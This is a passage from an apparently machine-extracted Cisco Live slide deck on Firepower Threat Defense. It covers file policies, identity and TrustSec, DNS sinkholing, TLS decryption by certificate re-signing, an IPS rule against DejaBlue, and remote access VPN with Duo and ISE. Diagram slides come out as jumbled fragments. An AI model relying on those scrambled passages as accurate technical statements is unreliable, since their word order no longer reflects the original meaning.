• Order does not matter 4. Detect Files
• Blocking takes precedence over malware inspection and blocking which takes
precedence over simple detection and logging
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 424
File Policy Association
Granular control to identify and block files transmitted on your network
root@gate1:/var/sf/detection_engines# cd 713c210c-7774-11e7-8d1c-c97d791ede62/
root@gate1:/var/sf/detection_engines/713c210c-7774-11e7-8d1c-c97d791ede62# cat ngfw.rules
#### ngfw.rules
--- snip ---
filepolicy 1 2526c8a2-3f52-11e8-b561-4c4afb51c75b
threatlevel 76
firstTimeAnalysis 1
malware log,block,reset http any neutral capture,sandbox
21:1,23:11,120:248,22:9,282:9,283:9,284:9,285:9,286:9,287:9,288:9,289:9,27:15
type log http any none none
--- snip ---
endpolicy
--- snip ---
# Start of AC rule.
--- snip ---
268448775 allow 2 any any 3 any any any any (log dcforward both) (ipspolicy 1) (filepolicy 1 enable) (appid
225:1, 3501:1, 676:1, 1696:5, 846:7, 4084:5)
# End rule 268448775
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP for Endpoints
AMP for Endpoints vs. AMP for Networks
FMC works with data from AMP for Networks and AMP for Endpoints
🔎
Internet
FMC
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 428
AMP for Networks vs. AMP for Endpoints
FMC works with data from AMP for Networks and AMP for Endpoints
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 429
Configuring an AMP for Endpoints Cloud
Connection
• AMP for Endpoints can import threat identifications,
indications of compromise (IOC), and other malware-related
information from the AMP cloud to the system
Configure settings as
needed. Define group
membership and assign
policies
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
AMP for Endpoint Integration
Network File Trajectory with AMP for Endpoints Events
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 435
Identity and TrustSec
FTD Identity Information
HR User can have access to Social Media Is 10.10.10.23 HR User or ENG User?
ENG User does NOT have access to Social Media 10.10.10.23 is HR User
FMC
Remote VPN
10.10.10.23 Access User-IP mapping
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 437
User awareness in Connection Events
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 438
User Based Indication of Compromise (IoC)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 440
User Based Indication of Compromise (IoC)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 441
User Control
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 442
User Identity Sources
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 443
For Your
Warning Message About Cisco Firepower Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 444
Identity Services Engine (ISE)
Cisco Platform Exchange Grid (pxGrid)
Active
Directory
IP - User mapping
Device Type
Rapid Threat
Location IP
Containment
SGT
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 445
For Your
Identity Services Engine (ISE) Reference
• Provides user awareness data for users who authenticate using Active Directory
(AD), LDAP, RADIUS, or RSA
• You can perform user control on Active Directory users
• Authoritative identity source
• Does not report the activity of ISE Guest Services users
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 446
ISE Passive Identity Connector (ISE-PIC)
• Input to ISE-PIC: WMI, ISE-PIC Agent, Kerberos SPAN, REST API, Syslog
• Output to FMC: pxGrid Publish/Subscribe
User-IP mapping
Active FMC
ISE-PIC
Switch Directory
HR
Servers
Non-802.1X Wireless Network
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 447
ISE-PIC
• The Cisco ISE Passive Identity Connector is a subset of functionality offered with
Cisco Identity Service Engine
• Supports only passive ID functionality
• ISE-PIC does not provide ISE attribute data (SGT, Device Type, Location)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 448
Access Control Identity Policy
Add Rule
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 449
Access Control Identity Policy
Add Rule
Active or Passive Authentication
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 450
Access Control Identity Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 451
For Your
ISE Integration – AD Group Information Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 452
Cisco TrustSec overview
Segmenting with Security Group Tags (SGTs)
Active
Directory
SGT-IP mapping
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 453
Security Group Tags (SGT) Classification
• Dynamic Classification
• MAB
• 802.1x
• WebAuth
• Static Classification
• L3 Interface (SVI)
• VLAN
• Subnet
• L2 port
• VM (Port Profile)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 456
SGT Dynamic Classification
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 457
SGT Static Classification
• IP SGT Static Mappings are the easiest way to add mappings to ISE
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 458
Security Group Tags (SGT) Propagation
DMAC SMAC 802.1AE Header 802.1Q CMD ETYPE PAYLOAD ICV CRC
CMD EtherType Version Length SGT Opt Type SGT Value Other CMD Options
16 bit (64K SGTs)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 459
SGT Propagation to FMC – pxGrid and SXP
Topics
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 461
Security Group Tags (SGT) Propagation
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 462
SGT Propagation - Inline Security Group Tags
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 466
Inline Security Group Tags (SGT) Configuration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 467
Security Group Tags (SGT) Enforcement
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 468
Create Access Control Rules with SGT Criteria
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 470
For Your
ISE Integration – Security Group Tag Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 471
For Your
ISE Integration – Device Type Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 472
For Your
ISE Integration – Location IP Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 473
Security Group Tags (SGT)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 474
Demo:
Identity and SGT
Security
Intelligence
Security Intelligence
• Network Intelligence
• URL Intelligence
• DNS Intelligence
• Multiple Categories: Attacker, Bogon, Bots, CnC, Cryptomining, DGA, Exploitkit, Malware,
OpenProxy, OpenRelay, Phishing, Response, Spam, Suspicious, TorExitNode
• Multiple Actions: Allow, Monitor, Block, Interactive Block…
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 479
Security Intelligence Policy
Access Control Policy Configuration
IP addresses
URLs
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 480
Security Intelligence Feed Service
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 481
Security Intelligence Dashboard
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 482
DNS Security
Intelligence
DNS Protection
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 484
DNS Inspection
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 485
Configuring DNS Policy
Adds new DNS Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 486
DNS Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 487
DNS Rule Configuration
Actions
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 488
Action: DNS Sinkhole
Sinkhole Server
Generate SI
Local Event & IOC
DNS Server
C&C over DNS C&C over DNS
10110110 Internet
10101111
Sinkhole IP Sinkhole IP
Connection to Sinkhole IP
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 489
Associate DNS Policy with an Access Control Policy
DNS Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 490
Security Intelligence Events
Action: Sinkhole
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 491
Cisco Threat
Intelligence
Director (CTID)
Cisco Threat Intelligence Director (CTID)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 493
How Does It Work?
Block Monitor
Cisco Threat
Intelligence Director
SI Lists
FMC
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 494
Prerequisites
• FMC:
• 6.2.2 (or later) version (can be hosted on
physical or virtual FMCs)
• Minimum of 15 GB of memory (FMCv)
• REST API access enabled
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 495
CTID Status
• Service is running:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 496
Configuration - Sources
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 497
Configuration - Indicators
Publish = download
to the FTD
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 498
Configuration - Observables
Set to Block or
Monitor per
observable
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 499
Incident Handling
• Incident Monitoring:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 500
Usability
Improvements
Contextual Cross-Launch
Firepower Version 6.3
• Launch a query into a different product, from any relevant event or dashboard
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 502
Contextual Cross-Launch
Several tools included
Other integrations
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 503
Contextual Cross-Launch
Additional integration - Stealthwatch
• Add your own Contextual Cross-Launch : Analysis -> Advanced -> Contextual
Cross-Launch
• Example for Cisco Stealthwatch:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 504
For Your
Contextual Cross-Launch Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 505
Contextual Cross-Launch
Additional integration - Tetration
• Add your own Contextual Cross-Launch : Analysis -> Advanced -> Contextual
Cross-Launch
• Example for Tetration:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 506
For Your
Contextual Cross-Launch Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 507
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 508
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 509
Hit Counts for Access Control and Prefilter Rules
Hit Count Dialog
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 510
Hit Counts for Access Control and Prefilter Rules
Search and Filter Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 511
Hit Counts for Access Control and Prefilter Rules
Clear Hit Count
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 512
Light Theme (Experimental)
Firepower version 6.5
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 513
Pagination for Access Control and NAT Policies
Firepower Version 6.5
Increased to 1000
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 514
Access Policy Filtering
Firepower Version 6.5
• FMC 6.5 adds string search/filter across all or specific ACP columns
Only show matching entries Search/Filter string
• Powerful tool for managing multi-tenant policies with Insert new rule…
• Future releases will add more flexible multi-column matching constructs and save
capabilities
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 515
Access Policy Filtering
Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 516
Improved Object Management
Firepower Version 6.5
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 517
Object Usage
Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 518
URL Filtering
URL Filtering
Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 520
Talos URL Filtering
Firepower Version 6.5
-3.0 < score <= 0.1 50 Neutral Benign sites with security risks
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 521
For Your
Talos URL Filtering Reference
• Backend:
• New daemon (beakerd)
• New database format (uridb)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 522
URL Backend - Databases
Firepower Version 6.5
• FMC/FDM push a full update file every Sunday, partial updates daily
• Merging of part file into current full and making new full DB happens only on Firewall
• Every Sunday with new Full file for each Cisco DB, all previous files will be purged
• For all pre-6.5.0 devices Talos publish two different DBs
• legacy_20m (holds 20 million entries)
• legacy_1m (holds 1 million entries)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 523
Dispute URL categories and reputations
Analysis > Advanced > Lookup > URL
• New link for “Dispute URL categories and reputations” – links to Talos website
•
The button shows up only
when cursor hovers over a
•
particular entry
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 527
Dispute URL categories and reputations
• URL Filtering page under System > Integration > Cloud Services
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 528
Dispute URL categories and reputations
• New dispute option is also added when you right click on URL category and/or URL
reputation under connection events
•
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 529
Dispute URL categories and reputations
Cloud Services
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 530
Transport Layer
Security (TLS)
Decryption
The Importance of TLS/SSL
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 532
TLS Decryption
IPS rules
• It works on any port, not just 443 and HTTPS: NGFW rules
• SMTPS, IMAPS, POP3S, FTPS…
Data acquisition
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 533
Hardware Acceleration
Firepower platform 4100 and 9300 2100 1000
• Default: ON, however you could switch OFF until version 6.4
system support {ssl-hw-offload enable | ssl-hw-offload disable}
• Displays the current status of SSL hardware acceleration: (the default state is 6.2.3:
disabled, 6.3 and 6.4: enabled)
system support ssl-hw-status
• From 6.4:
• TLS crypto acceleration cannot be disabled
• Support for TLS crypto acceleration on one FTD container instance on a Firepower 4100/9300
module/security engine, acceleration is disabled for other container instances, but enabled for
native instances
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 534
For Your
Hardware Acceleration Reference
Performance Numbers
1010 1120 1140 1150
4.5 Gbps 6.5 Gbps 7.1 Gbps 8 Gbps 7.3 Gbps 10 Gbps 7.5 Gbps
Throughput measured with 50% TLS 1.2 traffic with AES256-SHA with RSA 2048B key
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 535
TLS 1.2 Session Without TLS Decryption
Client Server
Client Hello “I choose to speak:
“I can speak TLS1.2
TLS1.2, AES256 and
or less, cipher list, Server Hello / Certificate and key exchange / this is my cert”
extensions”
Server Hello Done Subject and Subject
Server Name
Client Key Exchange / Change Cipher Spec / Alternate Names:
Indication (SNI)
Fields in the Certificate
extension: client Finished that identify the server
indicates which
hostname (FQDNs)
hostname it is
attempting to Change Cipher Spec /
connect Finished
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 537
TLS 1.3
Client Server
• Approved on March 21, 2018 Client Hello, supported
cipher suites, key share
• Several security and acceleration
improvements
• Not safe, old ciphers were removed: SHA1, DES, Server Hello / chosen cipher
MD5, ... suite / key share
Certificate & signature, finished
• “One-trip” and even “zero-trip instead of “two-trip””
(remembers connection), faster connection
• Zero-trip: replay attack vulnerability
Finished HTTP GET
• Server certificate is also encrypted
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 538
TLS 1.3 Downgrade
Undecryptable Action is taken
• You must restart snort before this change will take affect, this can be done via the
CLI command:
pmtool restartbytype DetectionEngine
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 539
Client Hello and TLS 1.3
Client Hello
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 540
TLS Decryption
Configuration
TLS Policy Rule Actions
• Each rule can specify how to process the matching TLS traffic:
• Decrypt using known certificate and key (for traffic destined to internal server)
• Decrypt using certificate re-sign (for outgoing traffic)
• Do-not-decrypt and Block/Block with Reset
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 544
Inspection with “Known Key” TLS Decryption
• DHE and ECDHE cannot be supported since traffic must be modified, industry
protocol limitation
• “Trusted CA” should be listed in the TLS Decryption policy
• Add the known key and certificate to here: Object > Object management > PKI >
Internal Certs
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 546
Inspection with “Known Key” TLS Decryption
Monitoring
• Intrusion Event:
• Connection Event:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 547
Use Case: Defend Against Encrypted DejaBlue
https://blog.talosintelligence.com/2019/09/the-latest-on-bluekeep-and-
dejablue.html
• BlueKeep, DejaBlue against CVE-2019-0708 RDP
Server
• Add RDP Server’s Certificate to FMC > Objects > Internal Cert
• Configure decryption rule
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Use Case: Defend Against Encrypted DejaBlue
(Cont.)
• Filter for Snort ID 51369: "OS-WINDOWS Microsoft Windows RDP
DecompressUnchopper integer overflow attempt.”
• Click the checkbox and select Rule State -> Drop and Generate Events
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 549
Use Case: Defend Against Encrypted DejaBlue
(Cont.)
• Result in the case of DejaBlue attack, IPS can protect:
Dropped packets
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 550
Inspection for Outgoing Traffic
• It cannot inspect outgoing traffic in passive mode since it requires modifying (re-
signing) the server cert
ABC
ABC #$* >!?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 551
TLS Decryption - Resign Method, Workflow
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 552
Intermediate CA Certificate
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 553
Certificate Installation and Usage
• After receiving the HTTPS Request, FTD will fetch the server
certificate from the destination
• It will create a new certificate with (nearly) all the fields and
sign this with her own certificate
• CRL is not replicated because it would not match the “new”
certificate
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 554
Inline TLS Decryption - Man in the Middle (MitM)
FTD
Client Server
Client Hello
Proxied Client Hello
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 556
Question:
• How could we control a domain in a policy? URL is encrypted, not visible yet!
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 558
Question:
• How could we control a domain in a policy? URL is encrypted, not visible yet!
• You can use the DN/CN of the cert: (CN != URL)
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
Conditions and Client and Server Hellos Reference
SSL Rule Condition Data Present In SSL Rule Condition Data Present In
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 560
Global TLS/SSL Rule Default action
Settings could be :
• Do not decrypt
• Block
• Block with
• Configurable actions on these reset
undecryptable cases:
• TLS Compression
• SSLv2
• Unknown or unsupported Cipher
Suite
• Uncached session ID
• Handshake or decryption error
Field in
Certain unsecure cipher Connections Events
Handshake error:
suites are not supported
Sign of TLS
when TLS hardware
Oversubscription
acceleration is enabled
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 561
Trusted CA Certificates
and CRL
• You reference that trusted CA object(s)
in an SSL policy
• You can upload CRLs to a trusted CA
object, supported formats: DER, PEM
• You can control encrypted traffic
whether the CA subsequently revoked
the certificate
• No limit to the number of CRLs
• Add CA who signed the CRL
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 563
TLS Decryption
Monitoring
Switch to Table view
Very useful;
Default = No TLS info
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Recommendation,
Best Practices
Recommendation:
Decryption and Access Policies IPS rules
Decrypt if
TLS
Data acquisition
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 572
Block Page; End User Notification (EUN)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 573
Recommendation: Block Weak Ciphers
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 575
Recommendation: Decrypt Uncategorized
Switch ON logging
(Default: No logging)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 576
Bad Certificate Handling – The Risk
Expired
Modified server cert server cert
Client Server
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 577
TLS Policy Rules
If the certificate
matches any of the
selected statuses, the
rule matches the traffic
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 578
Block Certificate Issues
• Log:
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 579
You cannot
decrypt everything
HTTP Strict Transport Security (HSTS) and MiTM
• Cert Pinning is the process of associating a host with their expected X.509
certificate(s) or public key, hard-code in the client/app the TLS/SSL cert(s) known to
be used by server
• No rogue CA, example: google services from Chrome 13, mobile apps, twitter,
box.com, ...
• Trust-On-First-Use (TOFU) mechanism able to detect and prevent a MITM attacks
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 588
Break – 15 Minutes
Remote Access
VPN (RA VPN)
Remote Access VPN - Use Case
ISP
• TLS/IPsec AnyConnect access
• Split Tunneling or Backhauling to
handle traffic from remote uses to Internet
Internet Edge
Private Network
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 591
Remote Access VPN Introduction
on FTD
• Dynamic Access Policy • AnyConnect • Simultaneous IKEv2
customization dynamic crypto map for
• Host Scan RA and L2L VPN
• AnyConnect scripts
• VPN load-balancer • AnyConnect modules
• AnyConnect localization (NAM, Hostscan, AMP
• Local authentication
(FDM can support it from • Per-app VPN Enabler etc.) – DART is
6.3) installed by default
• SCEP proxy
• LDAP attribute map • TACACS, Kerberos (KCD
• WSA integration Authentication and RSA
• SAML SSO SDI)
• Browser Proxy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 594
Pre-Configuration
Before Remote
Access VPN
Wizard
RA VPN Components
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
RA VPN Components (Cont.)
Connection
Profiles
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 597
Tasks Before the Remote Access VPN Wizard
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 598
Remote Access
VPN Wizard
RA VPN Wizard
Pre-Configuration:
“Before You Start”
• Devices > VPN > Remote Access > Add
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 607
RADIUS Server (like
ISE) can change it with
RADIUS CLASS
attribute IETF-Class-
25 (OU= group-policy-
name)
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 609
“outside-zone” is a
zone and FTD’s
outside interface is a
member
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 610
After Wizard Configuration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 611
NAT For RA VPN Users
• Order matters:
• No NAT towards RA VPN users
• PAT for the rest of traffic
RA VPN_address_pool
outside inside_subnet
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 618
Bypass Access Control Policy For RA VPN Users
• Bypass Access Control policy for decrypted traffic (sysopt permit-vpn) checkbox:
• If you check this checkbox, the VPN traffic into the internal network will bypass Snort
(no IPS, AMP and others)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 619
Access Control Policy (ACL) For RA VPN Users
Optional from version 6.3 RAVPN_address_pool
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 620
Profile Selection Options :
Alias and Web Access URL
• User can select profile based on alias
• URL syntax:
• https://<FTD-outside-IP>/alias
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 621
RA VPN Connection
• Open a browser, type DNS name or IP address pointing to the outside RA VPN
interface
• You will then have to login using credentials and follow instructions on the screen
• It will install AnyConnect and connect automatically
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 622
Group Policy Assignment From RADIUS Server
• FTD CLI
...
Bytes Tx : 48523 Bytes Rx : 23920
Group Policy : SecureGroupPolicy Tunnel Group : ISE-
posture
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 623
FTD RA VPN with Duo
Security Multi-Factor
Authentication (MFA)
Duo Security Introduction
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 625
FTD from 6.3 with Duo
AD or RADIUS
Server
LDAP/LDAPS
Duo or RADIUS
Cloud TCP 443
Duo
RADIUS
Proxy
RADIUS
FTD
VPN
On premise
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 627
Duo RADIUS Proxy
A Standalone Duo Software Acting as a RADIUS Server
Users need
longer
Timeout
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 629
FTD RA VPN with Duo
Security Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 631
FTD RA VPN with
RADIUS Change of
Authorization, CoA
FTD from 6.3 with RADIUS Change of
Authorization, CoA
• AnyConnect client connects to FTD and ISE authenticates it
• ISE tells FTD to restrict access to limit communications to
• Permit traffic to ISE for compliance checking
• Permit traffic to remediation servers (AV servers, download hotfixes…)
Permit to ISE
Permit to Remediation Request
Deny any File Server
Remediation
Accept, dACL I Server
S
URL-redirect E
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 633
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• AnyConnect is redirected to ISE for compliance checking
• Client remediates if necessary (AV update, Hotfix, Program Launched)
Remediation
I Server
Control S
E
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 634
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576)
message which makes FTD apply new authorization (permit traffic to internal
networks)
Permit to ISE
Permit to Remediation
Deny any File Server
Remediation
CoA Policy I Server
S
Push, dACL E
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 635
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576)
message which makes FTD apply new authorization (permit traffic to internal
networks)
Permit to any
File Server
Remediation
I Server
S
E
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 636
For Your
URL Redirect ACL Configured on FMC Reference
Negative logic:
block == do not redirect
permit == redirect
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 637
FMC: Add RADIUS CoA Server
FTD listens for CoA messages
on this interface
• Objects > Object Management > RADIUS Server Group
Inside
interface
Dynamic Authorization= CoA, Redirect ACL
default port: UDP/ 1700, RFC
standard: 3799
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 638
ISE and Downloadable ACL, SGT
• dACL:
• dACL has higher priority
• Do not expect URL redirect helps if dACL
drops the traffic
• SGT:
• SGT assignment to an RAVPN as a part of
the static authorization result was already
supported in FTD 6.2.3; FTD 6.3 adds
dynamic authorization with CoA
• There is still an enhancement request for
considering the assigned SGT in local permit ISE, REMEDIATION, DNS
policies permit ICMP
deny INTERNAL NETWORK
permit INTERNET
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 640
FTD RA VPN with
RADIUS CoA / ISE
Posture Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 642
FTD RA VPN with Duo
and RADIUS CoA
RAVPN with Duo and Posture
Duo
RADIUS
Proxy
AD
RADIUS
Duo Cloud
I
S
E
ISE
RADIUS
FTD
VPN
On premise
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 644
Authentication and Authorization Servers
ISE as an Authentication
AND Authorization
Server
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 645
FTD RA VPN with
Duo MFA and ISE
Posture Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 648
RA VPN with Duo
and LDAPS
RAVPN with LDAPS
ISE AD
Duo Cloud I
S
E
LDAPS
RADIUS
FTD
VPN On premise
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 650
RA VPN Secondary Authentication from 6.4
